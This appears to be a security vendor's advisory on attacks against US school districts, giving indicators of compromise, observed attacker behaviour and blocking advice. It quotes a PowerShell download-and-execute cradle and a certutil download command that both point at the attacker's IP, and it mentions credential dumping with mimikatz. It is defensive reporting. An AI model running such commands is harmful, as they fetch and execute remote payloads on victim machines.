There is recent increased activity targeting school districts across the United States that appear to be staging for ransomware and numerous crypto-mining campaigns targeting critical remote and authentication servers for students.

Related Indicators of Compromise

• 185.101.107[.]92
• powershell iex(New-Object Net.WebClient).DownloadString(‘hxxp://185.101.107[.]92/lol.ps1’)
• “certutil.exe -urlcache -split -f hxxp:///checkit2.exe c:/windows/temp/checkit2.exe”

Summary of Exploitation Attempts

Detections have shown traffic to 185.101.107[.]92, an IP geolocated in Bucharest, Romania, which is flagged as malicious by 16 vendors on VirusTotal and is reported to be associated with crypto mining activity as per AbuseIPDB. Shodan also reports the IP belongs to an ubuntu machine with ports 21, 22, and 80 exposed, which suggests this is maybe a staging point for the threat actors to conceal their actual IP address.

Malicious Java processes spawning PowerShell and cmd prompts executing internal enumeration, privilege escalation, credential theft, and external downloads via PowerShell have been observed.

Starting with a common threat actor tactic known as a download cradle to download post-exploitation and exfiltration tools and loading them straight into memory (evading detection on disk), we are also seeing malicious usage of certutil.exe which is a legitimate Windows executable commonly used to display certification authority configuration information and retrieve certificates. However, it is used maliciously by these threat actors to remotely download a payload as opposed to a certificate.

In this case, an executable may be stored in the temp folder and could easily be overlooked without proper investigation. Detections for lsass dumping (credential theft) were also observed and are typically found when tools like mimikatz or procdump are executed. These tools can be abused to steal credentials for exfiltration and password cracking as well as an escalation of privilege, allowing the threat actor one step closer to domain admin and completing their actions on objectives.

In one school district case, discovery found: whoami, systeminfo, ipconfig, net user, net local admin, net group “domain computers”, and many more reconnaissance commands. In another case, multiple users and a service account with high privilege were identified as having connected to the associated malicious IP.

Recommendations

• Use Geo-IP and block access to/from Romania if not needed in your environment
• Create access lists to block 185.101.107.92
• Review Internet traffic for any Indicators of Compromise

If you would like more information about this topic, please visit our get in touch page and contact us today.